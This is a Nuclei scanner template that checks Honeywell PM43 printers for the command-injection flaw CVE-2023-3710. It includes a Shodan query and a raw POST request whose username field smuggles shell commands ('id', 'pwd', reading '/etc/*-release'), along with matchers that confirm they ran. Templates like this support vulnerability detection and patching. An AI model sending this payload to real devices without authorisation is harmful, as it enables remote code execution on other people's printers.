55 lines
2.0 KiB
YAML
55 lines
2.0 KiB
YAML
id: CVE-2023-3710
|
|
|
|
info:
|
|
name: Honeywell PM43 Printers - Command Injection
|
|
author: win3zz
|
|
severity: critical
|
|
description: |
|
|
Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3710
|
|
- https://github.com/vpxuser/CVE-2023-3710-POC
|
|
- https://twitter.com/win3zz/status/1713451282344853634
|
|
- https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwaresignedP1019050004
|
|
- https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwarexasignedP1019050004A
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-3710
|
|
cwe-id: CWE-77,CWE-20
|
|
epss-score: 0.70301
|
|
epss-percentile: 0.97672
|
|
cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: honeywell
|
|
product: pm43_firmware
|
|
shodan-query: http.html:"/main/login.lua?pageid="
|
|
tags: cve,cve2023,honeywell,pm43,printer,iot,rce
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /loadfile.lp?pageid=Configure HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Release date'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100ae7b6a9d0f1769bbd6c299ed4352e0fc7bf13edcb0880788aedc85e8957b8d8402207551f84ef3e48e32da24ccbba0758a14fef1104522ec4eed0b35e1d7bb8d7d11:922c64590222798bb761d5b6d8e72950 |